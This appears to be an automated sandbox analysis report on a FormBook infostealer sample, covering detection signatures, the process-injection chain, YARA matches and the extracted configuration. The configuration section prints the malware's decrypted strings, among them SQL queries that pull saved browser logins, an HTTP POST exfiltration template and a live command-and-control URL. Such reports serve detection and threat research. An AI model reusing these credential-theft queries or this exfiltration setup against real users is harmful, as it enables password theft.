Play interactive tour

Edit tour

Analysis Report bXFjrxjRlb.exe

Overview

General Information

Sample Name:	bXFjrxjRlb.exe
Analysis ID:	344520
MD5:	4a595c5540f0a097a5f11159cdf5c015
SHA1:	9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
SHA256:	d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

bXFjrxjRlb.exe (PID: 1212 cmdline: 'C:\Users\user\Desktop\bXFjrxjRlb.exe' MD5: 4A595C5540F0A097A5F11159CDF5C015)

AddInProcess32.exe (PID: 6460 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cscript.exe (PID: 3684 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

cmd.exe (PID: 6932 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99c2", "KEY1_OFFSET 0x1e39e", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1e4a9", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1cfb3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x369b5b11", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121a0", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "ecatcom.com", "what3emoji.com", "primbathandbody.com", "yt-itclub.com", "newbieeer.com", "getyoursofa.com", "mexicanitems.info", "catalogcardgames.net", "leagueofwomengolfers.com", "gvanmp.com", "midnightsunhi.com", "cnluma.com", "sunsetcherrydesigns.com", "cosmoproturkey.com", "inifinityapps.net", "making50masks.com", "battalionice.com", "uk-calculation.net", "frosteatlove.com", "bs-mag.com", "cuisd.life", "searchlx.com", "treycorbies.com", "excellencepi.com", "4week-keto-results.com", "rotationdietplan.com", "chinahousecoralville.com", "xidao168.com", "detuimelaar.com", "fairschedulinglaws.com", "jinnolouie.com", "expresslacross.com", "akealuminum.com", "madebazar.com", "phimixx.com", "jel-tv365.com", "shakahats.com", "thabaddieztrap.net", "petsglorious.com", "misuperblog.com", "scorebuddycx.com", "sgbsmb.com", "coolbeanstudios.com", "khitthihonvidai.com", "myattorneychoicesyoufind.info", "thenewsdig.com", "freeuikit.net", "everydaycollars.com", "carrerco.com", "reviewdrkofford.com", "dragonflyroad.com", "quinple.com", "kollektiv.agency", "cimbank.info", "productoshealthyandfun.com", "dovecuwnebawe.com", "saihohealth.com", "thehostingroad.com", "tadalafil.website", "whereiswillgroup.com", "ukchealth.com", "alaskanoddgoods.com", "praktik-stuff.online", "gaiactg.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitedfootballcamps.com/bf3/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9dc4:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37408:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37682:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x158e7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x431a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x153d3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x42c91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x159e9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x432a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15b61:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4341f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa7dc:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3809a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1464e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x41f0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb4d5:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x38d93:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b599:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x48e57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c59c:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1867b:$sqlite3step: 68 34 1C 7B E1 0x1878e:$sqlite3step: 68 34 1C 7B E1 0x45f39:$sqlite3step: 68 34 1C 7B E1 0x4604c:$sqlite3step: 68 34 1C 7B E1 0x186aa:$sqlite3text: 68 38 2A 90 C5 0x187cf:$sqlite3text: 68 38 2A 90 C5 0x45f68:$sqlite3text: 68 38 2A 90 C5 0x4608d:$sqlite3text: 68 38 2A 90 C5 0x186bd:$sqlite3blob: 68 53 D8 7F 8C 0x187e5:$sqlite3blob: 68 53 D8 7F 8C 0x45f7b:$sqlite3blob: 68 53 D8 7F 8C 0x460a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x92d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9552:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbf81a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbfa94:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed0fa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xed374:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11a9ca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11ac44:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcb5b7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf8e97:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x126767:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcb0a3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf8983:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x126253:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcb6b9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf8f99:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x126869:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x152ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17e09:$sqlite3step: 68 34 1C 7B E1 0x17f1c:$sqlite3step: 68 34 1C 7B E1 0xce34b:$sqlite3step: 68 34 1C 7B E1 0xce45e:$sqlite3step: 68 34 1C 7B E1 0xfbc2b:$sqlite3step: 68 34 1C 7B E1 0xfbd3e:$sqlite3step: 68 34 1C 7B E1 0x1294fb:$sqlite3step: 68 34 1C 7B E1 0x12960e:$sqlite3step: 68 34 1C 7B E1 0x17e38:$sqlite3text: 68 38 2A 90 C5 0x17f5d:$sqlite3text: 68 38 2A 90 C5 0xce37a:$sqlite3text: 68 38 2A 90 C5 0xce49f:$sqlite3text: 68 38 2A 90 C5 0xfbc5a:$sqlite3text: 68 38 2A 90 C5 0xfbd7f:$sqlite3text: 68 38 2A 90 C5 0x12952a:$sqlite3text: 68 38 2A 90 C5 0x12964f:$sqlite3text: 68 38 2A 90 C5 0x17e4b:$sqlite3blob: 68 53 D8 7F 8C 0x17f73:$sqlite3blob: 68 53 D8 7F 8C 0xce38d:$sqlite3blob: 68 53 D8 7F 8C 0xce4b5:$sqlite3blob: 68 53 D8 7F 8C 0xfbc6d:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
1.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99c2", "KEY1_OFFSET 0x1e39e", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1e4a9", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1cfb3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x369b5b11", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", 